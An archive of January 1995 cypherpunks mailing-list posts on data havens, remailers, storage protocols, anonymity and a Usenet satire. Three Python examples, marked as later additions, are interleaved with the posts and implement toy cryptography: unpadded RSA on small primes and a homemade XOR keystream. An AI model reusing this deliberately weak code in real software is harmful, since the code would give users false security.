dwellers, who despite limited access to clean drinking
water, buy colour televisions and VCRs. They only needed
to see what TV was good for, first.

An information ocean is cheaper to build than any highway
could possibly be. It needs no legislation to exist
everywhere, this is in its very nature. Gateways to the
infosphere will, governments permitting, sprout
spontaneously wherever needed, as cracks on the surface of
a frozen sea.


Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).

--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 08:59:17 PST
To: cypherpunks@toad.com
Subject: BBC on Net trade, G7 special summit
Message-ID: <gate.iXJwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



BBC WSTV reports on commerce on the Net prior to a special G7 meet on
the implications of the infosphere. Surprisingly, they don't mention
anarchic blackmarketeers; more surprisingly they don't mention encryption -
which one might expect when they talk about a one-man garage firm settling
multimillion $ commodities trade contracts over the Net.

Some people are about to learn something really fast. Let's hope they don't
react like C&S.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 13 Jan 95 22:08:55 PST
To: Ben Goren <cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501140600.AA07244@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:07 PM 1/13/95, Ben Goren wrote:
> ... Alice hashes her file and uses that hash as the key to encrypt the file.
>She sends the file to Dave, and sends the original hash when she wants it
>back. Dave decrypts, and confirms the hash. 
>
>Unfortunately, this still doesn't quite close the loop--Dave knows the
>contents of the file once Alice sends the key. It does, however, make it
>very difficult for Dave to know anything about Alice's file. ... 

This seems overly complicated.  If Dave has a known public key, then Alice 
should be able to hash her file, sign the hash, encrypt (the hash, her 
public key, and the file) with Dave's public key, and (anonymously) send 
the result to Dave's (encrypted) address.  Dave then decrypts, verifies the 
sig, and stores the file, hash, and PK together, indexed by the hash.

When Alice wants the file back, she signs (the hash and her encrypted return 
address), encrypts the result with Dave's key, and sends it off.  Dave 
decrypts the request, fetches the public key based on the decrypted hash, 
verifies the signature, encrypts the file with Alice's provided public key, 
and sends it back to the encrypted return address. 

To avoid Dave's knowing the file contents, Alice can encrypt it before the 
described protocol and decrypt it afterwards.  The protocol is subject to a 
replay attack, but the result of the replay would cause the file to be sent 
to the original sender and not to the replayer.

The signed hash in the first step prevents people from spamming Dave with 
files that have Alice's public key.  Alice only requires an encrypted 
address and public key for Dave, and Dave validates the retrieval request 
against the public key sent in the first step.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com
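
The signature checks in the deposit and retrieval steps described above, as an added example that is not part of the original message. It uses unpadded textbook RSA over small fixed primes as a stand-in signature scheme, leaves out the public-key encryption layers to and from Dave, and has Dave check that the submitted hash matches the file; the key sizes, names and the return-address strings are assumptions for illustration.

```python
import hashlib

E = 65537  # public exponent


def make_keypair(p: int, q: int):
    """Toy RSA key from two known primes (assumption: illustration only)."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, E), (n, pow(E, -1, phi))


def _digest_int(message: bytes, n: int) -> int:
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(private_key, message: bytes) -> int:
    n, d = private_key
    return pow(_digest_int(message, n), d, n)


def verify(public_key, message: bytes, signature: int) -> bool:
    n, e = public_key
    return pow(signature, e, n) == _digest_int(message, n)


def request_bytes(file_hash: str, return_address: str) -> bytes:
    """The retrieval request Alice signs: the hash plus her return address."""
    return (file_hash + "|" + return_address).encode("utf-8")


# Constructed keys: Mersenne primes, far too small for real use.
ALICE_PUB, ALICE_PRIV = make_keypair(2**89 - 1, 2**107 - 1)
MALLORY_PUB, MALLORY_PRIV = make_keypair(2**61 - 1, 2**127 - 1)


class Dave:
    def __init__(self):
        self._store = {}  # file hash -> (file bytes, depositor's public key)

    def deposit(self, file_hash, signature, public_key, blob) -> bool:
        # Added check, not stated in the message: the hash must match the file.
        if hashlib.sha256(blob).hexdigest() != file_hash:
            return False
        # The signed hash must verify under the public key sent with the file.
        if not verify(public_key, file_hash.encode("ascii"), signature):
            return False
        self._store.setdefault(file_hash, (blob, public_key))
        return True

    def retrieve(self, file_hash, return_address, signature):
        """Return (address to send to, file) or None if the request is invalid."""
        entry = self._store.get(file_hash)
        if entry is None:
            return None
        blob, public_key = entry
        if not verify(public_key, request_bytes(file_hash, return_address),
                      signature):
            return None
        return return_address, blob


if __name__ == "__main__":
    dave = Dave()
    blob = b"constructed sample: already-encrypted file body"
    h = hashlib.sha256(blob).hexdigest()
    print("deposit accepted:",
          dave.deposit(h, sign(ALICE_PRIV, h.encode("ascii")), ALICE_PUB, blob))
    req_sig = sign(ALICE_PRIV, request_bytes(h, "alice-reply-block"))
    print("retrieval:", dave.retrieve(h, "alice-reply-block", req_sig)[0])
    # A replayed request is valid, but delivery still goes to Alice's address.
    print("replay goes to:", dave.retrieve(h, "alice-reply-block", req_sig)[0])
    # Changing the return address invalidates the captured signature.
    print("redirected replay:", dave.retrieve(h, "other-reply-block", req_sig))
```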





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 15:37:37 PST
To: cypherpunks@toad.com
Subject: Data Havens, NOT!
Message-ID: <gate.VaPwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
> The data haven concept as I understood it held data for public access in
> some form (for sale or for free) which would be illegal in some
> jurisdiction.  This might include credit information that was older than
> the legal limit, libelous claims, damaging medical records, etc.
> Frankly, I suspect that most usages would be directed towards reducing,
> rather than increasing, individual privacy.  So this is not an area I am
> interested in working towards.

I believe the Data Haven started out as a Message Haven to get the effect
of anon remailers with less traffic analysis hassles, so there would be no
pseudonymous login or anything, you'd either download everything, or apply
some filter (as with an alt.anon-messages group).

However, the current discussion of glorified remote file systems makes no 
sense to me. If you can keep something encrypted on a remote site as an 
archive, you can do it at home. A data haven is more likely to get busted 
than your home PC; serious efforts (RF pickup of keystrokes/display) will 
be equally effective in either case.

Here's a summary of data havens as I see them:

Remote file system where people can anon/pseudonymously dump and read files
- in the 'pure' variety there'd be no record of who posted/can read a file.

Advantages:
1. Could hinder traffic analysis, if they did not have pseudonymous login
   in any form. 
2. Could act as a store of encrypted data for those who can't/don't encrypt
   on their own systems
3. Could act as a backup

OTOH:
1. Would depend on 'correct usage' ie download of enough irrelevant cover 
   data, and would be vulnerable to analysis at the TCP/IP level. Newsgroups
   remain far better as means to evade traffic analysis
2. Don't keep all your encrypted BlackNet commodities in one basket - it
   can be busted more easily than your home machine. If you can encrypt there
   you can encrypt at home; if encryption is illegal at home, you can't legally
   access the havens.
3. Pfaugh! Rent space on Netcom.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 15:33:37 PST
To: cypherpunks@toad.com
Subject: Re: Cybersmut
Message-ID: <gate.ZFPwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


John Young quotes NY Post on Kiddie porn: 
   Rule No. 1 is that [kids] must never ever give their real 
   name, address or telephone number to anyone on-line. 

Hurray! Let's teach the next generation the value of pseudonymity now!
BAN TRUE NAMES! 
Note: I still have mine in my sig though... too late for me. Tim's axed his
phone # suddenly!

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Sat, 14 Jan 95 09:32:39 PST
To: plewis@nytimes.com
Subject: Final draft of editorial to SF Chronicle
Message-ID: <199501141731.JAA23607@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This is the final cut. Only minor copyedits have been made. Thanks to
all who responded -- about a dozen messages all strongly in favor.

Anyone know the email address or fax number for the Chicago Tribune?

Raph


Chaos and Anonymity keep the Internet Vital

I could not let Martha Siegel's editorial ("Anarchy, Chaos on the
Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed
reader, her arguments may seem plausible. However, her distortions
give a picture of the Internet quite at odds with the true nature of
the Net. Her views are by no means representative of those who
actually use the Net. Of the dozens of messages I saw in response to
the editorial, not a single one was in favor of her proposals.

As Ms. Siegel correctly points out, the Net is not governed by any one
individual person or organization. Rather, it is collectively run by
those who use it as part of their daily lives. The operation of each
Internet node is subject to the individual judgement of the people who
own it. Ms. Siegel is wrong, however, in believing that such a state
of affairs is intolerable. Rather, this state of affairs has brought
us a remarkable flowering of discourse, ideas and culture, which is
just now beginning to be recognized in the mainstream press.

In a lawyer's dream world, there is a rule covering every action in
every situation, along with a well-functioning system to enforce the
rules. This is the exact opposite of the spirit of the Net, and in
particular of Usenet, the collection of ten thousand newsgroups which
carries most public discussion on the Net. Rather, there has evolved
an informal set of guidelines for promoting open, civil discourse,
collectively known as "netiquette." These guidelines may seem arcane
to newcomers, but basically they simply ask people who use the Net to
be considerate of other people, their time and their resources. A
violation of netiquette brings on not legal action, but responses
pointing out why the action was inconsiderate. Continued violation
brings on ridicule and scorn -- people who engage in this are
considered to be either sociopathic or just obnoxiously
self-promoting.

The single most infamous breach of netiquette in Usenet history was
almost certainly the "green card spam," in which thousands of
advertisements for green card services were posted to completely
unrelated newsgroups. Advertisements presented in a way considerate to
others are tolerated and even welcomed on the Net. Posting thousands
of copies, though, is just going too far. Negative response was
immediate. The perpetrators were asked to stop, but they refused to.
One Norwegian hacker took it upon himself to track down and "cancel"
the offending messages. Most people on the Net considered this to be
entirely appropriate.

A number of other self-promoting hucksters have sensed an opportunity,
and have performed similar spams. In response, the Net evolved a
defense mechanism to counter these spams and minimize the damage. The
person currently serving this role is known by the pseudonym
"CancelMoose." Almost everyone on the Net supports this effort, and
agrees that it improves the overall value of Usenet.

Who was responsible for the original green card spam? Why, Ms. Siegel
herself, the same one who is complaining about "chaos and anarchy."
Chaos, anarchy, and anonymity are a large part of what keeps the Net
so vital.

Particularly galling is Ms. Siegel's appeal to free speech. Usenet in
its present form is perhaps the most conducive forum for free speech
in history. The threat to free speech is not from chaos or anonymity,
but from the sorts of changes that Ms. Siegel proposes.

Usenet is astonishingly effective in getting around the practical
barriers to free speech. These barriers come in many forms, including
libel, trademark, and copyright laws, fear of retribution, etc.
Because of its decentralized, communal nature, Usenet resists direct
attempts to censor. The main tool for circumventing these more
indirect barriers is anonymity.

As an example of such barriers, take the t-shirt commemorating the
green card incident. It was emblazoned with the words, "Green Card
Lawyers - Spamming the Globe" and a fist clutching a green card.
Shortly after the shirt was proposed, Canter & Siegel threatened to
sue if the shirt was in fact produced. It was only after several
outraged lawyers promised to defend against such a case pro bono that
I and others could be proud owners.

Or take one of the sexual abuse recovery newsgroups, where anonymity
is the norm. If someone were to post a message asking for support,
saying "my uncle did it" under their real name, they would be
vulnerable to a libel suit from said uncle. On the other hand, if they
used an anonymous service such as the one in Finland, they would not
simply escape punishment for the libel, but prevent it from happening
at all.

In many countries (and even China is on the Net these days), writings
critical of the government, such as exposure of human rights abuses,
are illegal. The authors face imprisonment, torture and death. By
posting anonymously to the Net, the information can be brought safely
to the attention of the world.

Not all anonymous messages are pleasant or popular. Unpopular speech
is a necessary consequence of free speech. At least to the founders of
this country, the benefits of free speech outweigh the discomfort. Our
founding fathers were also comfortable with anonymity -- the
Federalist papers were originally published under the pseudonym
Publius, because the authors felt the ideas should stand on their own,
without opinion being swayed by the names behind them.

Judging from the materials already published by Ms. Siegel, an
Internet built according to her vision would be free of such
disturbing ideas, but would readily support five hundred channels of
green card ads, impassioned pleas to purchase American flag plaques,
and, yes, anonymous testimonials for radial keratotomy specialists.

------------------------------
Raph Levien is a graduate student in computer science at the
University of California, Berkeley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 14 Jan 95 07:01:43 PST
To: cypherpunks@toad.com
Subject: NYT on Phiber Optik
Message-ID: <199501141501.KAA13781@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


There's an article today on Phiber's return to indecency, a recap of MOD
and celebratory party, with digs by unnabbed hiway-weebs. 
 
For copy send blank message with subject:  PHI_out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Sat, 14 Jan 95 09:51:54 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110104ab3db556857a@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


Paul, I think we're after two different objectives here. You want Alice to
be sure that Dave can't read her file; I want Dave to be sure that he can't
read Alice's files.

Alice should worry only about her privacy: if she doesn't want Dave to know
what she's sending, she should encrypt her file in a way that Dave cannot
break.

Dave certainly doesn't want to know what Alice is sending him, because he
might have to answer to a Grand Jury if he did. My protocol makes it very
difficult for Dave to gain any useful knowledge about Alice's files. Dave
does this not as a courtesy to Alice, but for those three wonderful
letters, CYA.

Of course, any data haven worth paying for will offer lots of neat
features, like PGP support, anonymous file drops, and all other sorts of
goodies. But that does little good if Alice can trick Dave into selling
child pornography.

Douglass Floyd asked, "How do I know if [be certain that] it's encrypted?"
Unfortunately, I'm pretty sure the answer is, "You decrypt it." My protocol
at least delays the decryption until it's [hopefully] too late to matter.

b&

[Here's part of the thread; nothing new follows.]

At 11:00 PM 1/13/95, Paul J. Ste. Marie wrote:
>At 10:07 PM 1/13/95, Ben Goren wrote:
>> ... Alice hashes her file and uses that hash as the key to encrypt the file.
>>She sends the file to Dave, and sends the original hash when she wants it
>>back. Dave decrypts, and confirms the hash.
>>
>>Unfortunately, this still doesn't quite close the loop--Dave knows the
>>contents of the file once Alice sends the key. It does, however, make it
>>very difficult for Dave to know anything about Alice's file. ...
>
>This seems overly complicated.  If Dave has a known public key, then Alice
>should be able to hash her file, sign the hash, encrypt (the hash, her
>public key, and the file) with Dave's public key, and (anonymously) send
>the result to Dave's (encrypted) address.  Dave then decrypts, verifies the
>sig, and stores the file, hash, and PK together, indexed by the hash.
>
>When Alice wants the file back, she signs (the hash and her encrypted return
>address), encrypts the result with Dave's key, and sends it off.  Dave
>decrypts the request, fetches the public key based on the decrypted hash,
>verifies the signature, encrypts the file with Alice's provided public key,
>and sends it back to the encrypted return address.
>
>To avoid Dave's knowing the file contents, Alice can encrypt it before the
>described protocol and decrypt it afterwards.  The protocol is subject to a
>replay attack, but the result of the replay would cause the file to be sent
>to the original sender and not to the replayer.
>
>The signed hash in the first step prevents people from spamming Dave with
>files that have Alice's public key.  Alice only requires an encrypted
>address and public key for Dave, and Dave validates the retrieval request
>against the public sent in the first step.
>
>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.
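
The hash-as-key deposit Ben describes in the quoted thread above, as an added sketch that is not code from any poster: the SHA-256 counter keystream stands in for a real cipher, and the receipt handle and `recognises_known_file` are hypothetical names. Because the key is derived from the file alone, the ciphertext is deterministic, so the last method shows that a holder who already has a candidate copy can recognise the deposit without ever receiving the key.

```python
import hashlib
import hmac

# Constructed sample file, embedded so the sketch runs offline.
SAMPLE = b"Quarterly figures, draft 3. Not for distribution.\n" * 40


def _keystream_xor(key, data):
    """Stand-in cipher (assumption): XOR with SHA-256(key || counter) blocks.

    The same call encrypts and decrypts. A real deployment would use a
    vetted cipher; this only keeps the sketch inside the standard library.
    """
    out = bytearray(len(data))
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        chunk = data[offset:offset + 32]
        out[offset:offset + len(chunk)] = bytes(a ^ b for a, b in zip(chunk, pad))
    return bytes(out)


def alice_deposit(plaintext):
    """Alice: key = hash(file). Returns (key she keeps, ciphertext she sends)."""
    key = hashlib.sha256(plaintext).digest()
    return key, _keystream_xor(key, plaintext)


class Dave:
    """The storage operator. He holds ciphertext only until a key is released."""

    def __init__(self):
        self.store = {}  # receipt -> ciphertext

    def accept(self, ciphertext):
        # Hypothetical lookup handle: the thread does not say how Dave indexes.
        receipt = hashlib.sha256(ciphertext).hexdigest()
        self.store[receipt] = ciphertext
        return receipt

    def release(self, receipt, key):
        """Decrypt with the key Alice sends and confirm hash(plaintext) == key."""
        plaintext = _keystream_xor(key, self.store[receipt])
        if not hmac.compare_digest(hashlib.sha256(plaintext).digest(), key):
            raise ValueError("hash of decrypted file does not match the key")
        del self.store[receipt]  # the file is handed back, nothing is kept
        return plaintext

    def recognises_known_file(self, receipt, candidate):
        """Deterministic encryption: re-deriving from a candidate copy
        reproduces the stored ciphertext exactly if the guess is right."""
        _, expected = alice_deposit(candidate)
        return hmac.compare_digest(expected, self.store[receipt])


def demo():
    key, ciphertext = alice_deposit(SAMPLE)
    dave = Dave()
    receipt = dave.accept(ciphertext)
    known = dave.recognises_known_file(receipt, SAMPLE)
    unknown = dave.recognises_known_file(receipt, SAMPLE + b"edited")
    returned = dave.release(receipt, key)
    return {"recognised_copy": known, "recognised_other": unknown,
            "round_trip": returned == SAMPLE}


if __name__ == "__main__":
    print(demo())
```
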






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Sat, 14 Jan 95 10:31:21 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501140112.AB29647@eri.erinet.com>
Message-ID: <d-06lG9s1aL5075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501140112.AB29647@eri.erinet.com>,
pstemari@erinet.com (Paul J. Ste. Marie) wrote:
> At 09:17 PM 1/12/95 -0600, Larry E wrote:
> 
> >         (2) legal groups etc. who may try to hold the remailer 
> >             liable in some way for what passes through their remailer.
> 
> It strikes me that this is a very weak defense.  Legal beagles will probably 
> argue that the remailer should have either prohibited encrypted 
> communications or else was in collusion with the sending party.
> 

Those who believe remailers are an evil will argue against any
measure that will promote their presence (and I'm not suggesting
you're in that group).  

I disagree strongly with their stance.  I would be happy if there
were three or four times as many remailers operating as there are
now.

The issue of whether encryption is a foolproof defense is not the
primary issue.  The issue is: what steps can be taken to improve the
lifespan of existing remailers and promote the addition of new ones.

Resolving the problems that cause remailers to fold will be an
evolutionary process, and no step along that path will be perfect or
resolve all the problems that plague the remailers. 

Is encryption a step in the right direction, if an imperfect one?  If
not I hope some other positive steps are proposed soon, else I fear
remailers may face extinction.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A.J. Janschewitz" <aj@pcnet.com>
Date: Sat, 14 Jan 95 09:46:07 PST
To: cypherpunks@toad.com
Subject: Media watch
Message-ID: <Pine.3.88.9501141224.B17993-0100000@pcnet1.pcnet.com>
MIME-Version: 1.0
Content-Type: text/plain


NPR's "Weekend Edition/Saturday" has an insubstantial piece on Phiber 
Optik on today's program, check local NPR times/listings.

Nexis-hunters might want to check out a manifestly stupid editorial in
today's Hartford (CT) Courant, significant only because it is the (L-A
Times-owned) paper of record in the state of greatest wealth in the U-S.
I would summarize it, but I don't understand it; something to do with
shrink-wrap copyrights and digital cash. 

Fax copies sent to interested parties, just give me a number.

==a.j.==

  "The large print giveth and the small print taketh away." - Tom Waits





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 14 Jan 95 10:29:55 PST
To: cypherpunks@toad.com
Subject: RE: State of PGP dll?; Encrypted session projects
Message-ID: <48550.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  sdw@lig.net (Stephen D. Williams)  writes:

> What is the state of the Windows/.dll PGP libraries?
> Does anyone have a usable version yet?

I helped David get a compiled version of a .DLL, but it was way too
raw to use. Specifically, all we did was make a DLL of all of the code,
exporting all of the subroutines. A useful .DLL would only publish
the "important" ones, and leave the internals hidden. The selection
of which routines need to be classified as "important" is a bunch of
work. Additionally, I expect that some of the routines would really be
better off with a wrapper that made less of their internals visible.
All quite doable, but a non-trivial effort. I know I'm too busy to
attack it.

> For Windows: twnsck12.zip, which is simple, is GNU, and has source and
> by writing a relatively simple windows serial terminal emulator and
> using Comt ($15 or 25 shareware) to convert it to a telnet client.
> Both of these could be modified fairly easily.

There are sources to a simple terminal emulator in the MSVC samples
directory. Changing it to use sockets wouldn't be all that hard.
Last time I looked, comt didn't work under NT, and so I stopped looking
at it.

There are also terminal emulators in the code in at least two books,
Monk's Windows Programmer's Guide to Serial Communications,
and Nelson's Serial Communications, a C++ Developer's Guide.
Since I'd much rather write C++ than C, I prefer Nelson's.

I use ewan as a terminal emulator, got it from cica or wustl, I forget
which. Dunno if sources are available.

> Does anyone have better ideas?  Any suggestions on login/key
> exchange sequence?

SKey would work if you are talking to a unix box that you can get
the admin to change.

Pat

Pat Farrell      Grad Student                 pfarrell@cs.gmu.edu
Department of Computer Science    George Mason University, Fairfax, VA
Public key available via finger         #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 14 Jan 95 15:39:11 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501142339.PAA08580@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to not be able to read the files on your storage site, then
why not just try reading them?  Check their entropy to make sure it is
maximal, check that they can't be unzipped, unstuffed, displayed as gif
or jpeg files.  When a new format becomes popular add that to the list.
This is all you can do.

What does this gain you?  I'm not sure.  If someone posts encrypted
Windows 95, then publicizes the location and the key, people will get the
data just as easily as if it were not encrypted.

Hal
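
The intake test Hal describes (maximal entropy, no recognisable archive or image format), as an added example that is not code from the list; the thresholds, the magic-number table and the samples are constructed assumptions. It also shows why a short file, or a fake crypto header in front of plaintext, fails the check, and it cannot tell ciphertext whose key has been published from any other ciphertext.

```python
import gzip
import hashlib
import math
from collections import Counter

MIN_BYTES = 4096    # assumption: below this a byte histogram is too sparse to judge
MIN_ENTROPY = 7.9   # assumption: bits per byte, out of a maximum of 8.0

# Leading bytes of the formats Hal names (zip, StuffIt, GIF, JPEG), plus gzip.
MAGIC = [
    (b"PK\x03\x04", "zip"),
    (b"\x1f\x8b", "gzip"),
    (b"SIT!", "StuffIt"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\xff\xd8\xff", "jpeg"),
]


def shannon_entropy(data):
    """Empirical Shannon entropy of the byte histogram, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def intake_check(data):
    """Return (accepted, reason) for one submitted file."""
    # A known header is rejected outright, whatever follows it.
    for magic, name in MAGIC:
        if data.startswith(magic):
            return False, f"recognised {name} header"
    # 256 random bytes can show at most 8 bits/byte and usually show far
    # less, so short files cannot be judged by entropy at all.
    if len(data) < MIN_BYTES:
        return False, "too short to estimate entropy"
    h = shannon_entropy(data)
    if h < MIN_ENTROPY:
        return False, f"entropy {h:.2f} bits/byte is below {MIN_ENTROPY}"
    return True, f"entropy {h:.2f} bits/byte, no known header"


def constructed_samples():
    """Constructed inputs; the 'ciphertext-like' bytes are SHA-256 output."""
    text = b"Meeting notes: the quick brown fox jumps over the lazy dog.\n" * 200
    noise = b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest()
                     for i in range(2048))  # 65536 bytes
    return {
        "ciphertext-like": noise,
        "plain text": text,
        "gzip of text": gzip.compress(text),
        "fake armor + text": b"-----BEGIN PGP MESSAGE-----\n" + text,
        "gif header + noise": b"GIF89a" + noise,
        "short noise": noise[:256],
    }


def run_samples():
    return {name: intake_check(data) for name, data in constructed_samples().items()}


if __name__ == "__main__":
    for name, (ok, reason) in run_samples().items():
        print(f"{name:20s} {'accept' if ok else 'reject'}  {reason}")
```
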




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Sat, 14 Jan 95 16:24:34 PST
To: cypherpunks@toad.com
Subject: Self-service computers
Message-ID: <v02110104ab3e19c20cc1@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


A friend of mine forwarded this to me; I couldn't resist forwarding it to
the list.

b&
----

Date: 4 JAN 1995 16:32:23 -0500
From: Kay Lukens <klukens@halcyon.com>
Newgroups: alt.humor.best-of-usenet
Subject: [pdx.general] Re: Keep self-service COMPUTERS out of Oregon!

From: keithl@chip.klic.rain.com (Keith Lofstrom)
Newsgroups: pdx.general,or.politics
Subject: Re: Keep self-service COMPUTERS out of Oregon!

It has been pointed out by the stalwart defenders of our rights (to be told
what to do) that self-service for gasoline is a Bad Thing.  We are assured
by many of the same people that self-service for pharmaceuticals, personal
defense, transportation, and education are also Bad Things.  Other folks,
nominally their political competitors (in the same sense that Burgerville
and Burger King are competitors) assure us that self-service in personal
morality is an *extremely* Bad Thing.  And look at what happened to
Joycelin Elders when she suggested self-service for sex...

From this, we must conclude that self-service is in itself highly suspicious.
Look at self-service grocery stores - all the time people are buying things
that are bad for them.  Self-service entertainment has resulted in Beavis
and Butthead.  And look at the way many computer professionals dress - if
this is not an indictment of self-service apparel, what is?

However, in the finest tradition of bureaucratic micromanagement, we as
computer professionals are not qualified to even consider these effects
on other aspects of Society.  Such thoughts must be reserved for Wiser
Heads Than Ours (unless of course the subject is economics or nuclear
power, in which case Our Opinions Count).

No, we as computer professionals must confine our thoughts to
self-service as it affects us - through our flagrant, dangerous,
and socially irresponsible use of Self-Service Computers!


Self-Service Computers:  Threat or Menace?

Carpal Tunnel Syndrome.  Backaches.  Obesity.  Bleeding Piles.  Bill
Gates and Steve Jobs.  Computers are a known health threat.  Reputed
Scientific Journals, such as the National Enquirer, are full of stories
of people being turned into three-headed cabbages by Nucular Radiation
from video displays.

It is obvious that the average computer professional, while quite able
to find obscure flaws in Pentiums or the secret levels in Doom, is a
helpless incompetent when it comes to actually typing on or reading from
personal computers.  We get so caught up in our alleged thinking that
we don't notice our bodies turning into rickety tubs of cancerous
lard.  We Need Help!

Meanwhile, the Great Unwashed Masses are being deprived access to
the Information Super Duper Highway.  Confined to low paying jobs
as sanitation workers or Congressional Representatives, these poor
wretches are unable to share in this cornucopia of undocumented,
virus-ridden software, poorly informed opinion, and stolen pornography
that we call the Internet.  These outcasts of the information age
must fritter away their time with such mind-numbing activities as
outdoor sports, rampant sex, and junkets to the Caribbean.

When these people accidentally find their way onto the Internet, perhaps
by mistakenly sending their rent check to America On Line, they begin
posting meaningless, inappropriate drivel such as spam advertisements
for shady lawyers, or actual referenced facts from original sources,
violating the hallowed traditions of the Internet.  While all citizens
must have access to the Net, LET'S NOT GET CARRIED AWAY HERE.


What Should We Do?  (That is, how can we find new excuses to control
other people with minority opinions?)


The only solution is to ELIMINATE self-service computers!  Every computer
in the State of Oregon *must* be operated by THREE OR MORE people - one
to do the thinking, one to do the typing, and one to read the screen -
preferably through a foot of leaded glass!  Think of all the jobs this
would create!  Not only would we have jobs for all the new operators
themselves, we could create vast new bureaucracies to insure that the
operators are specially trained, certified, and licensed!  Computer
Cops could roam the streets, equipped with special Jolt-sniffing dogs,
breaking down the doors of self-service scofflaws!  Pizza delivery
drivers would find new income and respect by turning in their hacker
clients!  Elizabeth Furse, famous for not reading her own email and for
having flunkies type in press releases, will become our shining symbol
of the new, socially responsible computer age!

You can help.  Send your checks to C.A.S.H., the Committee to Abolish
Selfservice Hardware, care of me (thnx Frank).  I will see that your
donation gets the attention it deserves.

And on behalf of all of us here at C.A.S.H. (Arnold who handles the left
side of the keyboard, Julia the right side, Millie the punctuation,
Sam who reads the verbs, Trevor who reads the nouns, and our shop
steward Penny, who is lobbying for a government grant to bring in a
mentally-challenged lesbian vegetarian special needs hispanic-surnamed
person of color to watch the blinky lights on the modem) may you have
an appropriate and socially enlightening seasonal celebration!

--
Moderators accept or reject articles based solely on the criteria posted
in the Frequently Asked Questions. Article content is the responsibility
of the submittor.  Submit articles to ahbou-sub@acpub.duke.edu. To write
to the moderators, send mail to ahbou-mod@acpub.duke.edu.

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






